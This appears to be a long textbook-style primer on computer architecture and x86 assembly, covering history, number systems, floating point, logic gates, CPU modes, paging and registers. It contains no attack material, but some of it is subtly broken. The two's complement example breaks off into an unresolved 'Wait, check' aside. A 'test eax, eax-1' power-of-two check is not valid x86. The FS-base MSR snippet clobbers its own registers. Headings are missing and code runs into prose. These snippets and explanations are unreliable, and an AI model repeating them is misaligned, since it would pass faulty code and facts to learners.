The evolution of computing systems represents one of humanity's most remarkable technological journeys. From mechanical calculating devices to modern quantum computers, this history provides essential context for understanding why assembly language programming remains relevant today.
The Pre-Electronic Era (Pre-1940s)
The earliest computing devices were mechanical. Charles Babbage's Analytical Engine (1837) conceived the fundamental elements of a modern computer: a store (memory), a mill (CPU), and punched cards for input/output. Ada Lovelace wrote algorithms for this machine, making her the world's first programmer. Herman Hollerith's tabulating machine (1890) used punched cards for the US Census, leading to the formation of IBM.
First Generation: Vacuum Tubes (1940-1956)
The Electronic Numerical Integrator and Computer (ENIAC), completed in 1945, represented a quantum leap. With 17,468 vacuum tubes, it could perform 5,000 additions per second—revolutionary for its time. However, programming required physically rewiring the machine. The Manchester Baby (1948) became the first stored-program computer, implementing the Von Neumann architecture we still use today. UNIVAC I (1951) became the first commercial computer, predicting Eisenhower's 1952 election victory with remarkable accuracy.
Second Generation: Transistors (1956-1963)
The transistor's invention at Bell Labs (1947) transformed computing. Transistors were smaller, more reliable, and generated less heat than vacuum tubes. IBM introduced the 1401 and 7090 mainframes. The first high-level languages emerged—FORTRAN (1957) and COBOL (1959). Assembly language became essential as programmers needed to interface between these new languages and the underlying hardware.
Third Generation: Integrated Circuits (1964-1971)
Jack Kilby and Robert Noyce independently invented the integrated circuit, allowing multiple transistors on a single chip. IBM's System/360 (1964) introduced the concept of a compatible family of computers, all sharing the same instruction set architecture—a principle that would later define x86 compatibility. The PDP-8 (1965) became the first successful minicomputer, priced at an accessible $18,000.
Fourth Generation: Microprocessors (1971-Present)
Intel's 4004 (1971), the first microprocessor, contained 2,300 transistors and ran at 740KHz. The 8080 (1974) powered the Altair 8800, sparking the personal computer revolution. The 8086 (1978) introduced the x86 architecture that dominates desktop computing to this day. Each subsequent generation—286, 386, 486, Pentium, Core—added features while maintaining backward compatibility.
The Modern Era
Today's processors contain billions of transistors. Apple's M1 (2020) demonstrates the power of system-on-chip design, integrating CPU, GPU, memory, and specialized accelerators. Yet the fundamental concepts remain—instructions execute, data moves, and assembly language provides the closest view of this process.
John Von Neumann's 1945 report "First Draft of a Report on the EDVAC" described a architecture that became the foundation of virtually all general-purpose computers.
Core Components
The Von Neumann architecture consists of four main subsystems:
- Central Processing Unit (CPU): Executes instructions
- Memory Unit: Stores both instructions and data
- Input/Output System: Communicates with external devices
- Control Unit: Coordinates operations
The Stored-Program Concept
The revolutionary insight was storing both program instructions and data in the same memory space. This allowed:
- Self-modifying code (common in early assembly programming)
- Programs to be treated as data (enabling compilers and assemblers)
- Easy loading of new programs into memory
The Fetch-Decode-Execute Cycle
The Von Neumann architecture operates through a continuous cycle:
- Fetch: The CPU retrieves an instruction from memory at the address stored in the Program Counter (PC)
- Decode: The Control Unit interprets the instruction
- Execute: The ALU or other components perform the required operation
- Store: Results are written back to memory or registers
The Von Neumann Bottleneck
The shared bus between CPU and memory creates a fundamental limitation—the "Von Neumann bottleneck." Since instructions and data share the same pathway, throughput is limited by bus bandwidth. This constraint has driven many architectural innovations:
- Cache memories (storing frequently used data closer to CPU)
- Harvard architecture (separate instruction and data paths)
- Superscalar execution (fetching multiple instructions simultaneously)
The Harvard Mark I, completed in 1944, used physically separate memory for instructions and data. This design offers distinct advantages:
Characteristics
- Separate address spaces for instructions and data
- Dedicated buses for each memory type
- Simultaneous access to instructions and data
Advantages
- No Von Neumann bottleneck for instruction fetch
- Security benefits (preventing code modification)
- Deterministic timing (critical for embedded systems)
Disadvantages
- More complex hardware
- Wasted memory if spaces are unbalanced
- Cannot load new programs easily
Modern processors typically implement a modified Harvard architecture, which combines features of both designs:
- Separate L1 caches for instructions and data
- Unified memory at higher levels (L2/L3 cache, main memory)
- Special instructions for accessing code as data
This approach gives the performance benefits of Harvard at the cache level while maintaining the flexibility of Von Neumann for main memory. Most ARM Cortex-M processors use modified Harvard, as do x86 processors at the cache level.
The philosophical divide between Complex Instruction Set Computer (CISC) and Reduced Instruction Set Computer (RISC) architecture has shaped processor design for decades.
CISC Characteristics (x86, 68000)
CISC emerged when memory was expensive and compilers were primitive. Key features include:
- Variable instruction length: Instructions can be 1-15 bytes on x86
- Complex instructions: Single instructions perform multi-step operations (e.g.,
REP MOVSBcopies entire strings) - Memory-operand instructions: Operations can work directly on memory
- Fewer registers: Historical constraints limited register count
- Microcode: Complex instructions are implemented as microcode routines
Advantages of CISC:
- Dense code (important when memory was expensive)
- Backward compatibility (x86 maintains 40+ years of compatibility)
- Simpler compilers (instructions map directly to high-level constructs)
RISC Characteristics (ARM, RISC-V, MIPS)
RISC emerged from research at IBM, Stanford, and UC Berkeley in the 1980s, emphasizing simplicity and regularity:
- Fixed instruction length: Typically 32 bits
- Simple instructions: Each instruction does one thing
- Load-store architecture: Only load/store access memory
- Many registers: Typically 32 general-purpose registers
- Hardwired control: No microcode, faster decoding
Advantages of RISC:
- Simpler pipeline design
- Easier to achieve high clock speeds
- More efficient compiler optimization
- Lower power consumption
The Modern Convergence
Modern x86 processors internally convert CISC instructions into RISC-like micro-ops, then execute them on a RISC-style core. ARM added thumb/thumb2 instructions for denser code. The distinction has blurred, but understanding both remains valuable for assembly programmers.
A modern CPU represents an astonishing feat of engineering, containing billions of transistors operating at gigahertz frequencies. Understanding its components helps assembly programmers write better code.
Core Components
-
Arithmetic Logic Unit (ALU): Performs arithmetic and logical operations
- Integer arithmetic (ADD, SUB, MUL, DIV)
- Bitwise operations (AND, OR, XOR, NOT)
- Shift and rotate operations
-
Floating Point Unit (FPU): Handles floating-point calculations
- IEEE 754 compliance
- SIMD/vector extensions for parallel floating-point
-
Control Unit: Coordinates instruction execution
- Instruction fetch and decode
- Branch prediction
- Exception handling
-
Cache Hierarchy: Multi-level memory caching
- L1: Fastest, smallest (32KB typical), split instruction/data
- L2: Larger (256KB-1MB), unified
- L3: Shared among cores (several MB)
- L4: Optional, eDRAM or similar
-
Memory Management Unit (MMU): Handles virtual-to-physical address translation
- Page table walking
- TLB (Translation Lookaside Buffer) caching
-
Register File: Fastest storage, directly accessible
- General-purpose registers
- Control/status registers
- Vector registers (for SIMD)
Superscalar Components
Modern processors can execute multiple instructions per cycle:
- Multiple execution units: Several ALUs, FPUs, load/store units
- Out-of-order execution: Reorder instructions for better throughput
- Register renaming: Eliminate false dependencies
- Speculative execution: Execute branches before they're resolved
With high-level languages dominating modern development, one might question assembly's relevance. However, assembly language programming remains crucial for several domains:
Performance-Critical Code
- Game engines: Graphics routines, physics calculations
- Encryption/decryption: AES, SHA implementations
- Signal processing: Audio/video codecs, DSP algorithms
- HPC applications: Mathematical libraries (BLAS, LAPACK)
System Programming
- Operating systems: Context switching, interrupt handlers, memory management
- Device drivers: Direct hardware interaction, MMIO
- Bootloaders: Initial system startup before C runtime available
- Hypervisors/VMMs: Virtual machine management
Reverse Engineering and Security
- Malware analysis: Understanding malicious code behavior
- Vulnerability research: Finding and exploiting bugs
- Binary patching: Modifying compiled programs
- Digital rights management: Bypassing protection mechanisms
Embedded Systems
- Microcontrollers: Small devices with limited resources
- Firmware: BIOS/UEFI, router firmware, IoT devices
- Real-time systems: Guaranteed timing constraints
Compiler Development
- Code generation: Understanding target architecture
- Optimization: Recognizing pattern opportunities
- Debugging: Analyzing compiler output
Education and Understanding
- Computer architecture: Deep understanding of how computers work
- Debugging skills: Reading disassembled code when debugging
- Security awareness: Understanding exploitation techniques
When Assembly Is Appropriate
- When performance is absolutely critical
- When hardware access is required
- When no compiler exists for the target
- When reverse engineering existing code
- When size constraints are extreme (boot sectors)
When Assembly Is Not Appropriate
- Most application development
- When portability matters
- When development speed is priority
- When maintenance cost must be minimized
Understanding number systems is fundamental to assembly programming, as computers ultimately work with binary representations.
Binary (Base-2)
Computers use binary because transistors have two stable states: on (1) and off (0). Each binary digit (bit) represents a power of 2:
Binary: 10110110
Value: 1×2⁷ + 0×2⁶ + 1×2⁵ + 1×2⁴ + 0×2³ + 1×2² + 1×2¹ + 0×2⁰
= 128 + 0 + 32 + 16 + 0 + 4 + 2 + 0
= 182 decimal
Common bit groupings:
- Nibble: 4 bits (one hex digit)
- Byte: 8 bits (fundamental addressable unit)
- Word: 16 bits (historical x86 word size)
- DWORD: 32 bits (double word)
- QWORD: 64 bits (quad word)
Octal (Base-8)
Octal was popular in early computing (PDP-8, UNIX permissions) because 3 bits group neatly:
Octal: 266
Binary: 010 110 110 (3 bits per digit)
Value: 2×8² + 6×8¹ + 6×8⁰ = 128 + 48 + 6 = 182 decimal
Decimal (Base-10)
Human-familiar system but problematic for computers because:
- 10 is not a power of 2
- Some decimal numbers have infinite binary representations (0.1)
- Binary-coded decimal (BCD) was developed to address this
Hexadecimal (Base-16)
The most common system in assembly programming because 4 bits fit perfectly:
Hex: B6
Binary: 1011 0110
Value: B×16¹ + 6×16⁰ = 11×16 + 6 = 176 + 6 = 182 decimal
Conversion Between Bases
Converting between binary and hex is straightforward due to the 4-bit grouping:
Binary: 1011 0110 1111 0001
B 6 F 1
Hex: B6F1
Converting decimal to binary involves repeated division:
182 ÷ 2 = 91 remainder 0 (LSB)
91 ÷ 2 = 45 remainder 1
45 ÷ 2 = 22 remainder 1
22 ÷ 2 = 11 remainder 0
11 ÷ 2 = 5 remainder 1
5 ÷ 2 = 2 remainder 1
2 ÷ 2 = 1 remainder 0
1 ÷ 2 = 0 remainder 1 (MSB)
Read remainders from bottom up: 10110110
The same binary pattern can represent different values depending on interpretation.
Unsigned Integers
All bits contribute to magnitude. Range for n bits: 0 to 2ⁿ-1
8-bit unsigned: 00000000 to 11111111 (0 to 255)
16-bit unsigned: 0 to 65535
32-bit unsigned: 0 to 4,294,967,295
64-bit unsigned: 0 to 18,446,744,073,709,551,615
Signed Magnitude
The simplest signed representation (rarely used):
- MSB represents sign (0=positive, 1=negative)
- Remaining bits represent magnitude
- Problem: Two representations for zero (+0 and -0)
+42: 00101010
-42: 10101010
One's Complement
Negatives are bitwise NOT of positives:
- Still has two zeros (+0=00000000, -0=11111111)
- Arithmetic requires end-around carry
- Used in some early computers (CDC 6600)
+42: 00101010
-42: 11010101
The universal signed integer representation in modern computers. Negatives are formed by inverting all bits and adding 1.
Formation Rule:
-N = ~N + 1
Examples with 8 bits:
+42: 00101010
-42: 11010110 (invert: 11010101, add 1: 11010110)
+127: 01111111
-128: 10000000 (invert: 10000000, add 1: 10000001? Wait, check)
Actually: +128 would be 10000000, but -128 is 10000000
Advantages of Two's Complement:
- Single representation for zero
- Addition/subtraction same for signed/unsigned
- Automatic modulo arithmetic
- Symmetric range except for most negative value
Range: -2ⁿ⁻¹ to 2ⁿ⁻¹-1
- 8-bit: -128 to 127
- 16-bit: -32,768 to 32,767
- 32-bit: -2,147,483,648 to 2,147,483,647
Sign Extension
Extending a signed number to more bits preserves value:
8-bit -42: 11010110
16-bit -42: 11111111 11010110 (copy sign bit to new high bits)
Real numbers require floating-point representation. IEEE 754 is the universal standard.
Scientific Notation Review
Decimal scientific notation: 1.234 × 10³ = 1234 Binary scientific notation: 1.011 × 2³ = 1011₂ = 11₁₀
IEEE 754 Single Precision (32-bit)
Bits: SEEEEEEE EMMMMMMM MMMMMMMM MMMMMMMM
Where:
S = Sign bit (1 bit)
E = Exponent (8 bits)
M = Mantissa/Significand (23 bits)
Components:
- Sign bit: 0 for positive, 1 for negative
- Biased exponent: Actual exponent + 127 bias
- Normalized mantissa: Leading 1 is implicit (except special cases)
Value Formula:
(-1)ˢ × 1.M × 2⁽ᴱ⁻¹²⁷⁾
Special Values:
- Zero: E=0, M=0 (±0 exists)
- Denormalized: E=0, M≠0 (gradual underflow)
- Infinity: E=255, M=0 (±∞)
- NaN: E=255, M≠0 (Not a Number)
Example: Representing 42.0
- Convert to binary: 42 = 32 + 8 + 2 = 101010₂
- Normalize: 101010 = 1.01010 × 2⁵
- Bias exponent: 5 + 127 = 132 = 10000100₂
- Mantissa: 01010 (implicit leading 1)
- Sign: 0 (positive)
Result: 0 10000100 01010000000000000000000
Double Precision (64-bit)
- Sign: 1 bit
- Exponent: 11 bits (bias 1023)
- Mantissa: 52 bits
- Range: ±10⁻³⁰⁸ to ±10³⁰⁸
Precision Limitations
Floating-point numbers are approximations:
- 0.1 in binary is repeating: 0.0001100110011...
- Some operations lose precision
- Comparison requires epsilon tolerance
Endianness describes byte ordering in multi-byte values.
Big-Endian
Most significant byte stored at lowest address (network byte order):
Memory address: [0] [1] [2] [3] Value 0x12345678: 0x12 0x34 0x56 0x78
Used by: network protocols, PowerPC, SPARC, 68000
Little-Endian
Least significant byte stored at lowest address:
Memory address: [0] [1] [2] [3] Value 0x12345678: 0x78 0x56 0x34 0x12
Used by: x86, x86-64, most ARM systems
Bi-Endian
Some architectures (ARM, MIPS) can switch endianness.
Implications for Assembly Programmers
- Multi-byte values read/written differently
- Network data requires byte swapping
- Type punning through unions/pointers affected
- Debugger memory dumps show reversed bytes on little-endian
Example in x86 Assembly:
; Storing 0x12345678 to memory
mov eax, 0x12345678
mov [mem], eax
; Memory now contains: 78 56 34 12
; To read as network order, need:
bswap eax ; byte swap instructionASCII (American Standard Code for Information Interchange)
7-bit encoding (0-127) covering English letters, digits, punctuation, and control characters:
0x41: 'A'
0x61: 'a'
0x30: '0'
0x20: Space
0x0D: Carriage Return
0x0A: Line Feed
Extended ASCII (8-bit) added characters 128-255, but varies by code page.
Unicode
Universal character set supporting all world scripts. Several encoding forms:
UTF-8
- Variable-length: 1-4 bytes per character
- ASCII characters use 1 byte (compatible with ASCII)
- Self-synchronizing (can find character boundaries)
- Dominant on web (over 95% of pages)
Encoding pattern:
0xxxxxxx (ASCII, 0-127)
110xxxxx 10xxxxxx (2 bytes, 128-2047)
1110xxxx 10xxxxxx 10xxxxxx (3 bytes, 2048-65535)
11110xxx 10xxxxxx 10xxxxxx 10xxxxxx (4 bytes, 65536+)
UTF-16
- Variable-length: 2 or 4 bytes
- Most common characters use 2 bytes
- Used internally by Windows, Java, .NET
- Surrogate pairs for characters beyond 65535
UTF-32
- Fixed 4-byte characters
- Simple but inefficient
- Rarely used except internally
Bitwise operations are fundamental to assembly programming.
AND (&)
Truth table: 1&1=1, 1&0=0, 0&1=0, 0&0=0 Use: Masking bits, clearing bits
and eax, 0x0F ; keep only low 4 bits
and eax, ebx ; bitwise ANDOR (|)
Truth table: 1|1=1, 1|0=1, 0|1=1, 0|0=0 Use: Setting bits
or eax, 0x80 ; set bit 7
or eax, ebx ; bitwise ORXOR (^)
Truth table: 1^1=0, 1^0=1, 0^1=1, 0^0=0 Use: Toggling bits, clearing registers
xor eax, eax ; zero register (faster than mov eax,0)
xor eax, 0xFF ; toggle low 8 bitsNOT (~)
Truth table: ~1=0, ~0=1 Use: Bitwise complement
not eax ; invert all bitsCommon Bit Manipulations
Test if bit n is set:
test eax, 1<<n ; AND without storing result
jnz bit_setSet bit n:
or eax, 1<<nClear bit n:
and eax, ~(1<<n)Toggle bit n:
xor eax, 1<<nExtract bit field:
; Extract bits 8-15 into low byte
mov ebx, eax
shr ebx, 8
and ebx, 0xFFCombine bit fields:
; Combine high byte of ax with low byte of bx
and eax, 0xFFFF00FF ; clear bits 8-15
and ebx, 0x0000FF00 ; isolate bits 8-15 of bx
or eax, ebx ; combineBitwise Tricks
Swap without temporary:
xor eax, ebx
xor ebx, eax
xor eax, ebxCheck power of two:
test eax, eax-1
jz power_of_two ; zero if power of two (and non-zero)Count set bits (population count):
; Modern x86 has POPCNT instruction
popcnt eax, eaxLogic gates are the building blocks of digital circuits. Understanding them helps assembly programmers appreciate what's happening at the lowest level.
Basic Gates
AND Gate
- Output HIGH only when ALL inputs HIGH
- Symbol: D-shaped symbol
- Truth table (2-input):
A B Q 0 0 0 0 1 0 1 0 0 1 1 1
OR Gate
- Output HIGH when ANY input HIGH
- Symbol: Curved input, pointed output
- Truth table:
A B Q 0 0 0 0 1 1 1 0 1 1 1 1
NOT Gate (Inverter)
- Output opposite of input
- Symbol: Triangle with bubble
- Truth table:
A Q 0 1 1 0
NAND Gate
- AND followed by NOT
- Universal gate (can build any circuit)
- Symbol: AND with bubble
NOR Gate
- OR followed by NOT
- Also universal
XOR Gate
- Output HIGH when inputs differ
- Symbol: OR with additional line
- Truth table:
A B Q 0 0 0 0 1 1 1 0 1 1 1 0
XNOR Gate
- Output HIGH when inputs same
- XOR followed by NOT
Gate Delay
Real gates have propagation delay (typically picoseconds to nanoseconds), which affects maximum clock speed and can cause race conditions.
Boolean algebra provides mathematical tools for analyzing and simplifying digital circuits.
Laws and Identities
Identity Laws:
- A + 0 = A
- A · 1 = A
- A + 1 = 1
- A · 0 = 0
Idempotent Laws:
- A + A = A
- A · A = A
Complement Laws:
- A + A' = 1
- A · A' = 0
Involution Law:
- (A')' = A
Commutative Laws:
- A + B = B + A
- A · B = B · A
Associative Laws:
- (A + B) + C = A + (B + C)
- (A · B) · C = A · (B · C)
Distributive Laws:
- A · (B + C) = A·B + A·C
- A + (B·C) = (A+B) · (A+C)
DeMorgan's Theorems:
- (A + B)' = A' · B'
- (A · B)' = A' + B'
Karnaugh Maps
Graphical method for simplifying Boolean expressions with up to 6 variables:
2-variable K-map:
B
0 1
A 0 | |
1 | |
Example: Simplify A'B + AB'
- K-map shows this is XOR
Flip-flops are sequential logic elements that store state.
SR Latch (Set-Reset)
Basic bistable element:
- S=1, R=0: Set Q=1
- S=0, R=1: Reset Q=0
- S=0, R=0: Hold state
- S=1, R=1: Invalid (race condition)
D Flip-Flop
Data flip-flop captures input on clock edge:
Truth table (positive edge-triggered):
Clock D Q(next)
↑ 0 0
↑ 1 1
otherwise Q unchanged
JK Flip-Flop
More versatile, eliminates invalid state:
- J=1, K=0: Set
- J=0, K=1: Reset
- J=1, K=1: Toggle
- J=0, K=0: Hold
Registers
Multiple D flip-flops sharing common clock form a register:
8-bit register:
D0 D1 D2 D3 D4 D5 D6 D7
| | | | | | | |
Clock---|--|--|--|--|--|--|--|--
Q0 Q1 Q2 Q3 Q4 Q5 Q6 Q7
Register Transfer Level (RTL)
Registers connected by combinational logic form the basis of CPU design. Assembly instructions correspond to RTL operations:
mov eax, ebx ; RTL: EAX ← EBX
add eax, ecx ; RTL: EAX ← EAX + ECXHalf Adder
Adds two bits, produces sum and carry:
Sum = A XOR B
Carry = A AND B
Truth table:
A B | Sum Carry
0 0 | 0 0
0 1 | 1 0
1 0 | 1 0
1 1 | 0 1
Full Adder
Adds three bits (two inputs plus carry-in):
Sum = (A XOR B) XOR Cin
Cout = (A AND B) OR (Cin AND (A XOR B))
Truth table:
A B Cin | Sum Cout
0 0 0 | 0 0
0 0 1 | 1 0
0 1 0 | 1 0
0 1 1 | 0 1
1 0 0 | 1 0
1 0 1 | 0 1
1 1 0 | 0 1
1 1 1 | 1 1
Ripple-Carry Adder
Chain full adders for multi-bit addition:
A3 B3 A2 B2 A1 B1 A0 B0
| | | | | | | |
FA3-----FA2-----FA1-----FA0--Cin
| | | |
Cout S3 S2 S1 S0
Carry Look-Ahead Adder
Faster than ripple-carry by precomputing carries:
- Generate: Gi = Ai AND Bi
- Propagate: Pi = Ai XOR Bi
- Carry: Ci+1 = Gi OR (Pi AND Ci)
Arithmetic Logic Unit (ALU)
ALU combines multiple operations with selection:
Control lines select function:
000: A AND B
001: A OR B
010: A + B
011: A - B
100: SLT (set if less than)
...
Block diagram:
A[31:0]───┐
│
B[31:0]───┼───┐
│ │
Control───┘ │
ALU │
│
Result[31:0]──┘
Flags (Zero, Carry, Overflow, Negative)
Control units generate the signals that coordinate CPU operations.
Hardwired Control
Logic gates generate control signals based on instruction:
- Fast but complex for large instruction sets
- Used in RISC processors
- Difficult to modify
Microprogrammed Control
Control signals stored in control store (ROM):
- Each instruction triggers microcode routine
- Easier to modify (microcode updates)
- Used in CISC processors
- Slower than hardwired
Microinstruction Format:
| Next Address | Control Signals | ALU Control | ... |
Microinstructions execute in sequence to implement machine instructions:
ADD instruction microcode:
1: MAR ← PC, Read memory, PC ← PC+1
2: IR ← Memory
3: Decode IR
4: A ← Register[IR.Rs]
5: B ← Register[IR.Rt]
6: ALU ← A + B
7: Register[IR.Rd] ← ALU
8: Fetch next instruction
The fundamental operation of a CPU is the fetch-decode-execute cycle.
Fetch Phase
- Program Counter (PC) contains address of next instruction
- Address placed on address bus
- Control signals request memory read
- Instruction word returned on data bus
- Instruction loaded into Instruction Register (IR)
- PC incremented to next instruction
Decode Phase
- Instruction Register contents decoded
- Control unit identifies operation and operands
- Register file addresses extracted
- Immediate values sign-extended
- Control signals prepared for execute phase
Execute Phase
- ALU performs required operation
- Memory read/write performed
- Register file updated
- Flags updated (Zero, Carry, etc.)
- PC modified for branches/jumps
Pipeline Stages
Modern CPUs pipeline this cycle:
| Cycle | Stage 1 | Stage 2 | Stage 3 | Stage 4 | Stage 5 |
|---|---|---|---|---|---|
| 1 | Fetch 1 | ||||
| 2 | Fetch 2 | Decode 1 | |||
| 3 | Fetch 3 | Decode 2 | Exec 1 | ||
| 4 | Fetch 4 | Decode 3 | Exec 2 | Mem 1 | |
| 5 | Fetch 5 | Decode 4 | Exec 3 | Mem 2 | Write 1 |
Pipeline Hazards
- Structural hazards: Resource conflicts
- Data hazards: Instruction depends on previous result
- Control hazards: Branches change flow
Solutions: stalling, forwarding, branch prediction, speculation
The x86 architecture's 40+ year history demonstrates remarkable backward compatibility while adding modern features.
8086 (1978)
- 16-bit architecture
- 20-bit address bus (1MB addressable)
- 14 registers: AX, BX, CX, DX, SI, DI, BP, SP, CS, DS, SS, ES, IP, FLAGS
- Segment:offset addressing
- No protection, no virtual memory
- Maximum 1MB RAM
8088 (1979)
- Same architecture as 8086
- 8-bit external data bus (cheaper implementation)
- Used in original IBM PC
80286 (1982)
- 16-bit, 24-bit address (16MB)
- Protected mode introduced
- Memory protection, but no virtual memory
- Backward compatible with real mode
80386 (1985)
- 32-bit architecture
- 32-bit registers (EAX, EBX, etc.)
- 32-bit address bus (4GB)
- Paging, virtual memory
- Protected mode enhancements
- Virtual 8086 mode
- Flat memory model possible
80486 (1989)
- Integrated FPU (except 486SX)
- 8KB L1 cache on-chip
- Pipeline improvements
- Faster instructions
Pentium (1993)
- Superscalar (2 instructions per cycle)
- 64-bit data bus
- MMX instructions (1997)
- Better FPU
Pentium Pro (1995)
- Out-of-order execution
- Conditional move instructions
- On-package L2 cache
Pentium II (1997)
- MMX, out-of-order
- Slot 1 cartridge
Pentium III (1999)
- SSE (70 new instructions)
- Streaming SIMD extensions
Pentium 4 (2000)
- NetBurst architecture
- Very deep pipeline
- SSE2, SSE3
- Hyper-Threading (2002)
Core Architecture (2006)
- Return to efficient pipeline
- 64-bit (EM64T)
- Multi-core
- Virtualization (VT-x)
Core i Series (2008+)
- Integrated memory controller
- Integrated graphics
- Turbo Boost
- AES-NI, AVX, AVX2
- Ring bus architecture
Modern x86-64
- 64-bit addressing (theoretically 16EB, practically less)
- 16 general-purpose registers (RAX, RBX, RCX, RDX, RSI, RDI, RBP, RSP, R8-R15)
- RIP-relative addressing
- No segmentation in 64-bit mode
- Legacy features removed
Real Mode
- 16-bit mode from 8086
- 1MB address space (20-bit)
- Segmented addressing: physical = segment×16 + offset
- No protection between programs
- Direct hardware access
- Operating system can crash from any program
- Used by bootloaders, BIOS
Real mode addressing example:
mov ax, 0x1000 ; segment
mov ds, ax
mov bx, 0x2000 ; offset
mov al, [bx] ; accesses physical 0x1000×16 + 0x2000 = 0x12000
Protected Mode
- Introduced with 286, matured with 386
- 32-bit addressing (4GB)
- Memory protection through segmentation and paging
- Privilege levels (rings)
- Virtual memory
- Multitasking support
- Protected from errant programs
Virtual 8086 Mode
- Run real-mode programs within protected mode
- Each VM86 task has 1MB virtual space
- Traps sensitive instructions
- Used by Windows 9x for DOS programs
Long mode is x86-64's 64-bit mode.
Sub-modes
- 64-bit mode: True 64-bit execution
- Compatibility mode: Run 16/32-bit apps under 64-bit OS
Features
- 64-bit virtual addresses (48/57 bits actually used)
- 64-bit general purpose registers
- 8 new registers (R8-R15)
- 16 XMM registers (vs 8 in 32-bit)
- RIP-relative addressing
- No segmentation (except FS/GS for thread-local storage)
- Flat memory model
Addressing Limitations
- Current CPUs use 48-bit virtual addresses (256TB)
- 4-level paging (48 bits) or 5-level paging (57 bits)
- Canonical addresses: bits 63:48 must be sign-extended from bit 47
x86 provides four privilege levels (0-3) called rings:
Ring 0: Kernel (most privileged)
Ring 1: Device drivers (rarely used)
Ring 2: Device drivers (rarely used)
Ring 3: Applications (least privileged)
Ring Transitions
- Calls: SYSENTER/SYSEXIT, SYSCALL/SYSRET
- Interrupts: Hardware interrupts, software interrupts (INT n)
- Exceptions: Page faults, divide errors, etc.
What Each Ring Can Do
Ring 0 can:
- Execute privileged instructions (LGDT, MOV to CR0, etc.)
- Access all memory
- Disable interrupts
- Modify page tables
Ring 3 cannot:
- Execute privileged instructions (cause #GP fault)
- Access kernel memory (unless mapped with user access)
- Halt the CPU
Segmentation divides memory into variable-sized segments.
Segment Selectors
16-bit value in segment register:
Bits 15-3: Index into descriptor table
Bit 2: Table Indicator (0=GDT, 1=LDT)
Bits 1-0: Requested Privilege Level (RPL)
Descriptor Tables
- GDT (Global Descriptor Table): Shared by all tasks
- LDT (Local Descriptor Table): Per-task segments
- IDT (Interrupt Descriptor Table): Interrupt handlers
Segment Descriptor (8 bytes):
Byte 0-1: Segment Limit (15:0)
Byte 2-3: Base Address (23:0)
Byte 4: Access Rights
Bit 7: Present
Bits 6-5: Privilege Level (0-3)
Bit 4: Descriptor Type (1=code/data, 0=system)
Bit 3: Executable (1=code, 0=data)
For code: Bit 2: Conforming, Bit 1: Readable
For data: Bit 2: Direction, Bit 1: Writable
Bit 0: Accessed
Byte 5: Flags + Limit (19:16)
Bits 7-4: Flags (G=granularity, D/B=default size, L=long mode, AVL=available)
Bits 3-0: Limit (19:16)
Byte 6-7: Base Address (31:24)
Address Translation
Logical address (segment:offset) → Linear address → (optional paging) → Physical
Paging provides virtual memory, protection, and isolation.
Page Tables
Modern x86 uses 4-level (or 5-level) page tables:
CR3 → PML4 → PDPT → PD → PT → 4KB Page
9 bits 9 bits 9 bits 9 bits 12 bits offset
Page Table Entry (64-bit)
Bit 0: Present
Bit 1: Read/Write
Bit 2: User/Supervisor
Bit 3: Page-level Write-Through
Bit 4: Page-level Cache Disable
Bit 5: Accessed
Bit 6: Dirty
Bit 7: Page Size (1 for 2MB/1GB pages)
Bit 8: Global
Bits 9-11: Available
Bits 12-51: Physical Address (page-aligned)
Bits 52-62: Available
Bit 63: Execute Disable (NX bit)
Large Pages
- 2MB pages (PDE with PS=1)
- 1GB pages (PDPTE with PS=1)
TLB (Translation Lookaside Buffer)
Caches recent page translations:
- Small (tens to hundreds of entries)
- Very fast (accessed in parallel)
- Needs invalidation on page table changes
Paging Benefits
- Isolated address spaces
- Demand paging (pages loaded on fault)
- Shared memory (same physical page mapped multiple times)
- Copy-on-write
- Memory overcommitment
x86-64 provides 16 general-purpose registers, each 64 bits wide.
Legacy 32-bit Names
64-bit | 32-bit | 16-bit | 8-bit (low) | 8-bit (high)
-------|--------|--------|-------------|------------
RAX | EAX | AX | AL | AH
RBX | EBX | BX | BL | BH
RCX | ECX | CX | CL | CH
RDX | EDX | DX | DL | DH
RSI | ESI | SI | SIL | -
RDI | EDI | DI | DIL | -
RBP | EBP | BP | BPL | -
RSP | ESP | SP | SPL | -
R8 | R8D | R8W | R8B | -
R9 | R9D | R9W | R9B | -
R10 | R10D | R10W | R10B | -
R11 | R11D | R11W | R11B | -
R12 | R12D | R12W | R12B | -
R13 | R13D | R13W | R13B | -
R14 | R14D | R14W | R14B | -
R15 | R15D | R15W | R15B | -
Register Purposes (Conventional)
- RAX: Accumulator, return value, syscall number
- RBX: Base register (callee-saved)
- RCX: Counter (loop, shift/rotate count)
- RDX: Data register (extended accumulator, I/O)
- RSI: Source index (string operations)
- RDI: Destination index (string operations)
- RBP: Base pointer (frame pointer, callee-saved)
- RSP: Stack pointer
- R8-R15: General purpose (some syscall args in System V)
Segment Registers in 64-bit Mode
Most segmentation is disabled, but FS and GS remain:
- CS: Code segment (not used directly)
- DS: Data segment (ignored, treated as 0)
- SS: Stack segment (ignored, treated as 0)
- ES: Extra segment (ignored, treated as 0)
- FS: Used for thread-local storage (TEB in Windows, TCB in Linux)
- GS: Used for other per-CPU data
FS/GS Base Address
In 64-bit mode, FS and GS have hidden base addresses set via MSRs:
; Set FS base to value in RCX
mov ecx, 0xC0000100 ; MSR_FS_BASE
mov eax, ecx ; low 32 bits
shr rcx, 32 ; high 32 bits
mov edx, ecx
wrmsrControl registers (CR0-CR4, CR8) control processor features.
CR0 (System Control Flags)
Bit 0: PE - Protected Mode Enable
Bit 1: MP - Monitor Coprocessor
Bit 2: EM - Emulate Coprocessor
Bit 3: TS - Task Switched
Bit 4: ET - Extension Type (80386 only)
Bit 5: NE - Numeric Error
Bit 16: WP - Write Protect (supervisor write protection)
Bit 18: AM - Alignment Mask
Bit 29: NW - Not Write-through
Bit 30: CD - Cache Disable
Bit 31: PG - Paging Enable
CR1: Reserved
CR2: Page Fault Linear Address (address that caused fault)
CR3: Page Directory Base Register (physical address of top-level page table)
CR4 (Extended Features)
Bit 0: VME - Virtual-8086 Mode Extensions
Bit 1: PVI - Protected-Mode Virtual Interrupts
Bit 2: TSD - Time Stamp Disable (RDTSC privilege)
Bit 3: DE - Debugging Extensions
Bit 4: PSE - Page Size Extensions
Bit 5: PAE - Physical Address Extensions
Bit 6: MCE - Machine Check Enable
Bit 7: PGE - Page Global Enable
Bit 8: PCE - Performance-Monitoring Counter Enable
Bit 9: OSFXSR - OS Supports FXSAVE/FXRSTOR
Bit 10: OSXMMEXCPT - OS Supports SIMD Exceptions
Bit 11: UMIP - User-Mode Instruction Prevention
Bit 12: FSGSBASE - Enable RDFSBASE/WRFSBASE instructions
